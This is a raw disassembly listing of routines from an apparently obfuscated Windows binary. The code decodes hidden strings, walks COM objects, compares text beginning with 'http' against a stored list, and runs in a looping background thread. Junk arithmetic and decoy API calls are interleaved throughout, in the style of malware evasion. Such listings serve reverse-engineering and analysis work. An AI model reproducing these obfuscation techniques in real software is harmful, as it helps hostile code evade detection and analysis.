lea eax, [ebp+var_525FE]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407F0E
cmp [ebp+var_525FE], 0
jz short loc_407028
mov ax, word_4413A5
mov [ebp+var_5265A], ax
jmp loc_407F0E
; ---------------------------------------------------------------------------
loc_407028: ; CODE XREF: sub_406E2B+1E9�j
lea edi, [ebp+var_52661]
lea esi, aJXe? ; "J$xE+?"
mov ecx, 7
rep movsb
mov ax, word_4413AE
mov [ebp+var_52663], ax
lea edi, [ebp+var_52666]
lea esi, byte_4413B0
mov ecx, 3
rep movsb
mov [ebp+var_10001], 0
mov [ebp+var_2], 0
lea eax, [ebp+var_52604]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+5Ch]
mov ebx, eax
lea edi, [ebp+var_52667]
lea esi, byte_4413B3
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jnz loc_407F0E
lea eax, [ebp+var_52640]
push eax
mov eax, [ebp+var_52604]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C5A4 ; GetVersion
or ebx, ebx
jnz loc_407EF4
mov [ebp+var_52606], 281Eh
movzx eax, [ebp+var_52606]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52606], ax
or [ebp+var_524CC], 0FFFFFFFFh
loc_4070DC: ; CODE XREF: sub_406E2B+B65�j
and [ebp+var_5260C], 0
and [ebp+var_52614], 0
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407133
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_525F8]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov [ebp+var_52684], 638Dh
add [ebp+var_52684], 5FB7h
or ebx, ebx
jnz loc_407979
call sub_40C514 ; GetCurrentThreadId
jmp loc_40724E
; ---------------------------------------------------------------------------
loc_407133: ; CODE XREF: sub_406E2B+2C6�j
lea edi, [ebp+var_52696]
lea esi, a9ebg ; "9EB#"
mov ecx, 3
rep movsw
mov [ebp+var_52690], 17h
mov eax, [ebp+var_524CC]
mov [ebp+var_52688], eax
lea eax, [ebp+var_526A8]
push eax
lea eax, [ebp+var_52690]
push eax
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+1Ch]
lea eax, [ebp+var_5260C]
push eax
push offset dword_446BD4
mov eax, [ebp+var_526A0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C598 ; GetTickCount
or ebx, ebx
jnz loc_407979
call sub_40C508 ; GetCurrentProcessId
lea eax, [ebp+var_52614]
push eax
mov eax, [ebp+var_5260C]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
or ebx, ebx
jz short loc_4071E9
call sub_40C634 ; IsDebuggerPresent
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea edi, [ebp+var_526AA]
lea esi, byte_4413BA
xor ecx, ecx
inc ecx
rep movsb
jmp loc_407979
; ---------------------------------------------------------------------------
loc_4071E9: ; CODE XREF: sub_406E2B+395�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_52614]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
lea edi, [ebp+var_526A9]
lea esi, byte_4413BB
xor ecx, ecx
inc ecx
rep movsb
or ebx, ebx
jz short loc_40724E
lea edi, [ebp+var_526B8]
lea esi, a854 ; "^85/4=|"
movsd
movsd
mov eax, [ebp+var_52614]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_526B0], 97Dh
inc [ebp+var_526B0]
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_407979
; ---------------------------------------------------------------------------
loc_40724E: ; CODE XREF: sub_406E2B+303�j
; sub_406E2B+3E6�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
or ebx, ebx
jnz loc_407E8E
and [ebp+var_21784], 0
jmp loc_407967
; ---------------------------------------------------------------------------
loc_407277: ; CODE XREF: sub_406E2B+B48�j
mov [ebp+var_627C0], 0B8h
add [ebp+var_627C0], 1
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_626B8], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626B0], eax
lea eax, [ebp+var_626A4]
push eax
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626B8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
mov ax, word_4413C4
mov [ebp+var_627CC], ax
or ebx, ebx
jnz loc_407961
call sub_40C508 ; GetCurrentProcessId
and [ebp+var_626BC], 0
lea eax, [ebp+var_626BC]
push eax
push offset dword_446BB4
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C634 ; IsDebuggerPresent
or ebx, ebx
jnz loc_407683
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_626C0]
push eax
mov eax, [ebp+var_626BC]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
mov [ebp+var_627C2], 7A7Ch
movzx eax, [ebp+var_627C2]
imul eax, 2CBEh
mov [ebp+var_627C2], ax
or ebx, ebx
jnz loc_407683
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_62687]
push eax
push [ebp+var_626C0]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6269C], edi
lea edi, [ebp+var_627D3]
lea esi, aWUn@ ; " w*UN@"
mov ecx, 7
rep movsb
and [ebp+var_52684], 0
jmp short loc_4073D6
; ---------------------------------------------------------------------------
loc_4073AD: ; CODE XREF: sub_406E2B+5B7�j
mov eax, [ebp+var_52684]
mov al, [ebp+eax+var_62687]
cmp al, 0Dh
jz short loc_4073C2
cmp al, 0Ah
jnz short loc_4073D0
loc_4073C2: ; CODE XREF: sub_406E2B+591�j
mov eax, [ebp+var_52684]
mov [ebp+eax+var_62687], 0
loc_4073D0: ; CODE XREF: sub_406E2B+595�j
inc [ebp+var_52684]
loc_4073D6: ; CODE XREF: sub_406E2B+580�j
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb short loc_4073AD
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_407441
mov [ebp+var_627E0], 1CC7h
movzx eax, [ebp+var_627E0]
imul eax, 5DEDh
mov [ebp+var_627E0], ax
push 11h
push offset aAmdgKLvA ; "Ѡȵ"
call sub_406D88
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627BF]
push edi
call sub_40CA30
lea eax, [ebp+var_627BF]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 1Ch
jmp short loc_4074AB
; ---------------------------------------------------------------------------
loc_407441: ; CODE XREF: sub_406E2B+5C0�j
mov ax, word_4413CD
mov word ptr [ebp+var_627E4], ax
push 13h
push offset aLMaiLvA ; "ѫȵȵ"
call sub_406D88
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627BF]
push edi
call sub_40CA30
mov [ebp+var_627E0], 4C50h
add [ebp+var_627E0], 6D23h
lea eax, [ebp+var_627BF]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 20h
mov word ptr [ebp+var_627E4+2], 322Ah
inc word ptr [ebp+var_627E4+2]
loc_4074AB: ; CODE XREF: sub_406E2B+614�j
and [ebp+var_52684], 0
loc_4074B2: ; CODE XREF: sub_406E2B+76B�j
mov eax, [ebp+var_52684]
lea ecx, [ebp+eax+var_62687]
or eax, 0FFFFFFFFh
loc_4074C2: ; CODE XREF: sub_406E2B+69C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4074C2
mov [ebp+var_62690], eax
mov [ebp+var_627C3], 84h
add [ebp+var_627C3], 1
mov eax, [ebp+var_62690]
cmp eax, 0
jz short loc_4074EF
cmp eax, 0C8h
jbe short loc_4074F4
loc_4074EF: ; CODE XREF: sub_406E2B+6BB�j
jmp loc_40757D
; ---------------------------------------------------------------------------
loc_4074F4: ; CODE XREF: sub_406E2B+6C2�j
lea edi, [ebp+var_627DA]
lea esi, aGAkux ; ";AKuX"
mov ecx, 7
rep movsb
cmp [ebp+var_62690], 1
jnz short loc_407520
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_62687], 20h
jz short loc_40757D
loc_407520: ; CODE XREF: sub_406E2B+6E3�j
call sub_40C598 ; GetTickCount
push 1
push offset aS_0 ; ""
call sub_406D88
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40CA54
mov [ebp+var_627C4], 0A6h
add [ebp+var_627C4], 0B3h
mov eax, [ebp+var_52684]
lea eax, [ebp+eax+var_62687]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CA54
add esp, 18h
mov [ebp+var_627C8], 61DCh
sub [ebp+var_627C8], 2883h
loc_40757D: ; CODE XREF: sub_406E2B:loc_4074EF�j
; sub_406E2B+6F3�j
mov eax, [ebp+var_62690]
inc eax
add [ebp+var_52684], eax
mov eax, [ebp+var_6269C]
cmp [ebp+var_52684], eax
jb loc_4074B2
and [ebp+var_62698], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_4075AC: ; CODE XREF: sub_406E2B+786�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4075AC
mov [ebp+var_62690], eax
call sub_40C634 ; IsDebuggerPresent
mov [ebp+var_52684], 0
jmp loc_407663
; ---------------------------------------------------------------------------
loc_4075CD: ; CODE XREF: sub_406E2B+844�j
lea edi, [ebp+var_627E4+1]
lea esi, aEW ; " E~^W"
mov ecx, 3
rep movsw
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jz short loc_4075F8
and [ebp+var_6268C], 0
loc_4075F8: ; CODE XREF: sub_406E2B+7C4�j
call sub_40C508 ; GetCurrentProcessId
cmp [ebp+var_6268C], 0
jnz short loc_407630
call sub_40C5A4 ; GetVersion
mov eax, [ebp+var_62698]
mov edx, [ebp+var_52684]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
call sub_40C508 ; GetCurrentProcessId
inc [ebp+var_62698]
loc_407630: ; CODE XREF: sub_406E2B+7D9�j
mov eax, [ebp+var_52684]
cmp [ebp+eax+var_10001], 20h
jnz short loc_40764A
mov [ebp+var_6268C], 1
loc_40764A: ; CODE XREF: sub_406E2B+813�j
lea edi, [ebp+var_627E8]
lea esi, aUD ; "u;D "
mov ecx, 5
rep movsb
inc [ebp+var_52684]
loc_407663: ; CODE XREF: sub_406E2B+79D�j
mov eax, [ebp+var_62690]
cmp [ebp+var_52684], eax
jb loc_4075CD
mov eax, [ebp+var_62698]
mov [ebp+eax+var_10001], 0
loc_407683: ; CODE XREF: sub_406E2B+4FB�j
; sub_406E2B+53D�j
and [ebp+var_62694], 0
lea eax, [ebp+var_62694]
push eax
push offset dword_446BC4
mov eax, [ebp+var_626A4]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_407947
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_626A0]
push eax
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
call sub_40C508 ; GetCurrentProcessId
or ebx, ebx
jnz loc_40792D
lea edi, [ebp+var_627DD]
lea esi, asc_4413E1 ; "=="
mov ecx, 3
rep movsb
and [ebp+var_52688], 0
jmp loc_407909
; ---------------------------------------------------------------------------
loc_4076F6: ; CODE XREF: sub_406E2B+AEA�j
call sub_40C514 ; GetCurrentThreadId
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_627F8], 2
mov eax, [ebp+var_52688]
mov [ebp+var_627F0], eax
lea eax, [ebp+var_627E8]
push eax
lea esi, [ebp+var_627F8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_627F8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_62694]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_407903
mov [ebp+var_6280D], 0Fh
add [ebp+var_6280D], 1
and [ebp+var_627E4], 0
lea eax, [ebp+var_627E4]
push eax
push offset dword_446BB4
mov eax, [ebp+var_627E8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
or ebx, ebx
jnz loc_4078C6
lea edi, [ebp+var_62813]
lea esi, aT6rr ; "T6Rr"
mov ecx, 5
rep movsb
cmp [ebp+var_627E4], 0
jz loc_4078C6
mov [ebp+var_6280E], 85h
add [ebp+var_6280E], 1
lea eax, [ebp+var_62808]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627E4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov eax, dword_4413E9
mov [ebp+var_62818+1], eax
or ebx, ebx
jnz loc_4078C6
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_62808], 8
jnz loc_4078C6
call sub_40C514 ; GetCurrentThreadId
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627E4]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52688]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62808]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627E4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_4078C2
call sub_40C538 ; RtlGetLastWin32Error
lea edi, [ebp+var_63822]
lea esi, aFA ; ",F`>a"
mov ecx, 3
rep movsw
call sub_40C598 ; GetTickCount
lea eax, [ebp+var_63816]
push eax
push [ebp+var_62800]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6381C], edi
call sub_40C538 ; RtlGetLastWin32Error
cmp [ebp+var_63816], 0
jz short loc_4078BD
cmp edi, 64h
jnb short loc_4078BD
lea eax, [ebp+var_63816]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C4B8
loc_4078BD: ; CODE XREF: sub_406E2B+A70�j
; sub_406E2B+A75�j
call sub_40C634 ; IsDebuggerPresent
loc_4078C2: ; CODE XREF: sub_406E2B+A26�j
inc [ebp+var_2]
loc_4078C6: ; CODE XREF: sub_406E2B+968�j
; sub_406E2B+988�j ...
cmp [ebp+var_627E4], 0
jz short $+2
call sub_40C514 ; GetCurrentThreadId
cmp [ebp+var_627E8], 0
jz short loc_4078E9
mov eax, [ebp+var_627E8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_4078E9: ; CODE XREF: sub_406E2B+AB0�j
mov [ebp+var_6280C], 6832h
mov eax, [ebp+var_6280C]
mov edx, eax
add edx, eax
mov [ebp+var_6280C], edx
loc_407903: ; CODE XREF: sub_406E2B+92D�j
inc [ebp+var_52688]
loc_407909: ; CODE XREF: sub_406E2B+8C6�j
mov eax, [ebp+var_626A0]
cmp [ebp+var_52688], eax
jb loc_4076F6
jmp short loc_407961
; ---------------------------------------------------------------------------
mov [ebp+var_627CA], 3C6Eh
inc [ebp+var_627CA]
loc_40792D: ; CODE XREF: sub_406E2B+8A6�j
cmp [ebp+var_62694], 0
jz short loc_407942
mov eax, [ebp+var_62694]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407942: ; CODE XREF: sub_406E2B+B09�j
call sub_40C634 ; IsDebuggerPresent
loc_407947: ; CODE XREF: sub_406E2B+87F�j
cmp [ebp+var_626A4], 0
jz short loc_40795C
mov eax, [ebp+var_626A4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_40795C: ; CODE XREF: sub_406E2B+B23�j
call sub_40C514 ; GetCurrentThreadId
loc_407961: ; CODE XREF: sub_406E2B+4C4�j
; sub_406E2B+AF0�j
inc [ebp+var_21784]
loc_407967: ; CODE XREF: sub_406E2B+447�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_407277
loc_407979: ; CODE XREF: sub_406E2B+2F8�j
; sub_406E2B+370�j ...
call sub_40C508 ; GetCurrentProcessId
inc [ebp+var_524CC]
mov eax, [ebp+var_52640]
cmp [ebp+var_524CC], eax
jl loc_4070DC
lea edi, [ebp+var_52668]
lea esi, byte_4413F3
xor ecx, ecx
inc ecx
rep movsb
loc_4079A7: ; CODE XREF: sub_406E2B+CB6�j
push 0
call sub_40C9B8
pop ecx
call sub_40C5A4 ; GetVersion
mov [ebp+var_21786], 0
jmp loc_407A91
; ---------------------------------------------------------------------------
loc_4079C2: ; CODE XREF: sub_406E2B+C73�j
call sub_40C538 ; RtlGetLastWin32Error
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
lea edi, [ebp+var_62690+1]
lea esi, aBmiJ ; "MI ~j"
mov ecx, 7
rep movsb
or ebx, ebx
jnz loc_407A8A
lea edi, [ebp+var_62698+2]
lea esi, aVsbag0 ; "SAg0"
mov ecx, 7
rep movsb
lea eax, [ebp+var_6267F]
push eax
push [ebp+var_524D8]
call sub_40692E
add esp, 8
mov edi, eax
inc edi
mov [ebp-62688h], edi
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_6267F], 0
jz short loc_407A8A
mov [ebp+var_62682], 4C04h
movzx eax, [ebp+var_62682]
imul eax, 0D94h
mov [ebp+var_62682], ax
cmp dword ptr [ebp-62688h], 64h
jnb short loc_407A8A
lea eax, [ebp+var_6267F]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C4B8
loc_407A8A: ; CODE XREF: sub_406E2B+BD6�j
; sub_406E2B+C19�j ...
inc [ebp+var_21786]
loc_407A91: ; CODE XREF: sub_406E2B+B92�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_4079C2
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_441354
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_52628], 0AD1h
add [ebp+var_52628], 0D59h
or ebx, ebx
jnz loc_407F0E
call sub_40C574 ; GetProcessHeap
cmp [ebp+var_525FE], 0
jz loc_4079A7
lea edi, [ebp+var_52669]
lea esi, byte_441402
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+var_2177D], 0
push offset byte_41EB90
lea eax, [ebp+var_2177D]
push eax
call sub_40C4B8
mov [ebp+var_5260E], 164Dh
movzx eax, [ebp+var_5260E]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5260E], ax
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407C46
; ---------------------------------------------------------------------------
loc_407B45: ; CODE XREF: sub_406E2B+E28�j
mov word ptr [ebp+var_52684+2], 712h
movzx eax, word ptr [ebp+var_52684+2]
imul eax, 568Ah
mov word ptr [ebp+var_52684+2], ax
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407C3F
mov ax, word_441403
mov word ptr [ebp+var_52688+2], ax
and [ebp+var_525E8], 0
push 4
push offset asc_445FAA ; "ȵ"
call sub_406D88
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40CA30
mov eax, dword_441405
mov [ebp-5268Ah], eax
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
mov word ptr [ebp+var_52684], 0F32h
inc word ptr [ebp+var_52684]
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
call sub_40C598 ; GetTickCount
push 1
push offset asc_445FA8 ; ""
call sub_406D88
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CA54
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
add esp, 3Ch
call sub_40C538 ; RtlGetLastWin32Error
loc_407C3F: ; CODE XREF: sub_406E2B+D49�j
inc [ebp+var_1177E]
loc_407C46: ; CODE XREF: sub_406E2B+D15�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407B45
cmp [ebp+var_525E8], 0
jnz loc_407E8E
call sub_40C634 ; IsDebuggerPresent
push 1
push offset asc_445FA6 ; ""
call sub_406D88
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CA54
call sub_40C634 ; IsDebuggerPresent
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CA54
add esp, 18h
cmp ds:byte_41EB90, 68h
jnz short loc_407CC3
cmp ds:byte_41EB91, 74h
jnz short loc_407CC3
cmp ds:byte_41EB92, 74h
jnz short loc_407CC3
cmp ds:byte_41EB93, 70h
jz short loc_407CC8
loc_407CC3: ; CODE XREF: sub_406E2B+E7B�j
; sub_406E2B+E84�j ...
jmp loc_407E43
; ---------------------------------------------------------------------------
loc_407CC8: ; CODE XREF: sub_406E2B+E96�j
lea edi, [ebp+var_5266F]
lea esi, aSHt ; "S ht|"
mov ecx, 3
rep movsw
push 8
push offset aKvvkbi ; "Ê"
call sub_406D88
mov edi, 11h
sub edi, dword_441380
push edi
push eax
push offset byte_41EB90
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407D3A
push 0Eh
push offset aKvvkbiMiMqi ; "ÊÌ"
call sub_406D88
mov edi, 11h
sub edi, dword_441380
push edi
push eax
push offset byte_41EB90
call sub_401806
add esp, 14h
cmp eax, 0FFFFh
jz loc_407E43
loc_407D3A: ; CODE XREF: sub_406E2B+EDC�j
mov [ebp+var_5262A], 0E36h
movzx eax, [ebp+var_5262A]
imul eax, 5F1Ah
mov [ebp+var_5262A], ax
mov [ebp+var_525EE], 0
loc_407D60: ; CODE XREF: sub_406E2B+FE4�j
mov eax, 11h
sub eax, dword_441380
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:44138Ch[eax]
push eax
push offset byte_41EB90
call sub_401806
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407DBC
call sub_40C574 ; GetProcessHeap
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F270
mov [ebp+var_52684], 5D23h
sub [ebp+var_52684], 3A68h
jmp loc_407E43
; ---------------------------------------------------------------------------
loc_407DBC: ; CODE XREF: sub_406E2B+F62�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52684], eax
lea ecx, ds:44138Ch[eax]
or eax, 0FFFFFFFFh
loc_407DD3: ; CODE XREF: sub_406E2B+FAD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407DD3
mov esi, [ebp+var_52684]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
mov [ebp+var_5262B], 0EFh
add [ebp+var_5262B], 52h
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_44138C[eax], 0
jnz loc_407D60
call sub_40C5A4 ; GetVersion
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F270
mov [ebp+var_5260F], 20h
movzx eax, [ebp+var_5260F]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_5260F], al
loc_407E43: ; CODE XREF: sub_406E2B:loc_407CC3�j
; sub_406E2B+F09�j ...
mov [ebp+var_21788], 0
jmp short loc_407E7A
; ---------------------------------------------------------------------------
loc_407E4E: ; CODE XREF: sub_406E2B+105C�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407E73
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407E73: ; CODE XREF: sub_406E2B+1032�j
inc [ebp+var_21788]
loc_407E7A: ; CODE XREF: sub_406E2B+1021�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407E4E
call sub_40C574 ; GetProcessHeap
loc_407E8E: ; CODE XREF: sub_406E2B+43A�j
; sub_406E2B+E35�j
cmp [ebp+var_525E4], 0
jz short loc_407EA3
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EA3: ; CODE XREF: sub_406E2B+106A�j
lea edi, [ebp+var_52674]
lea esi, aWG ; "W ^"
mov ecx, 5
rep movsb
cmp [ebp+var_52614], 0
jz short loc_407ECB
mov eax, [ebp+var_52614]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407ECB: ; CODE XREF: sub_406E2B+1092�j
lea edi, [ebp+var_5267A]
lea esi, aDXN ; "d:x`n"
mov ecx, 3
rep movsw
cmp [ebp+var_5260C], 0
jz short loc_407EF4
mov eax, [ebp+var_5260C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407EF4: ; CODE XREF: sub_406E2B+287�j
; sub_406E2B+10BB�j
cmp [ebp+var_52604], 0
jz short loc_407F09
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F09: ; CODE XREF: sub_406E2B+10D0�j
call sub_40C538 ; RtlGetLastWin32Error
loc_407F0E: ; CODE XREF: sub_406E2B+176�j
; sub_406E2B+1DB�j ...
cmp [ebp+var_525F8], 0
jz short loc_407F23
mov eax, [ebp+var_525F8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407F23: ; CODE XREF: sub_406E2B+10EA�j
mov [ebp+var_52630], 52EFh
mov eax, 3A5Eh
mul [ebp+var_52630]
mov [ebp+var_52688], eax
mov [ebp+var_52630], eax
loc_407F44: ; CODE XREF: sub_406E2B+155�j
cmp [ebp+var_525F4], 0
jz loc_406E95
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
jmp loc_406E95
; ---------------------------------------------------------------------------
loc_407F62: ; CODE XREF: sub_406E2B+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_406E2B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F67 proc near ; DATA XREF: sub_40801C+2F�o
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset word_44141A
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call sub_40C5A4 ; GetVersion
mov [ebp+var_4], 0
call sub_40C538 ; RtlGetLastWin32Error
loc_407F9E: ; CODE XREF: sub_407F67+7A�j
; sub_407F67+9A�j
call sub_40C634 ; IsDebuggerPresent
mov edi, dword_44137C
add edi, 1F3h
push edi
call sub_40C9B8
add esp, 4
call sub_40C5A4 ; GetVersion
call sub_406E2B
mov [ebp+var_1C], 6E5Bh
mov eax, 6540h
mul [ebp+var_1C]
mov [ebp+var_20], eax
mov edi, [ebp+var_20]
mov [ebp+var_1C], edi
cmp dword_441388, 0
jnz short loc_407F9E
jmp short loc_40800A
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_40800A
; ---------------------------------------------------------------------------
mov [ebp+var_1C], 1
mov eax, [ebp+var_1C]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_40C5A4 ; GetVersion
jmp short loc_407F9E
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_40800A: ; CODE XREF: sub_407F67+7C�j
; sub_407F67+85�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407F67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40801C proc near ; CODE XREF: sub_40A766+7F2�p
var_9 = byte ptr -9
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
lea edi, [ebp+var_9]
lea esi, aB2U ; "2 U "
mov ecx, 7
rep movsb
mov eax, [ebp+arg_0]
mov ds:dword_40F270, eax
call sub_40C598 ; GetTickCount
push offset dword_441388
push 0
push 0
push offset sub_407F67
push 0
push 0
call sub_40C754 ; CreateThread
mov ebx, eax
mov [ebp+var_1], 0EEh
movzx eax, [ebp+var_1]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_1], al
push ebx
call sub_40C55C ; CloseHandle
mov [ebp+var_2], 5
sub [ebp+var_2], 0F2h
pop edi
pop esi
pop ebx
leave
retn
sub_40801C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push edi
mov edi, 5B3h
inc edi
cmp dword_441354, 0
jnz short loc_408097
xor eax, eax
jmp short loc_4080DD
; ---------------------------------------------------------------------------
loc_408097: ; CODE XREF: .text:00408091�j
mov byte ptr [ebp-1], 16h
add byte ptr [ebp-1], 1
mov eax, ds:dword_42EB94
cmp [ebp+8], eax
jz short loc_4080AD
xor eax, eax
jmp short loc_4080DD
; ---------------------------------------------------------------------------
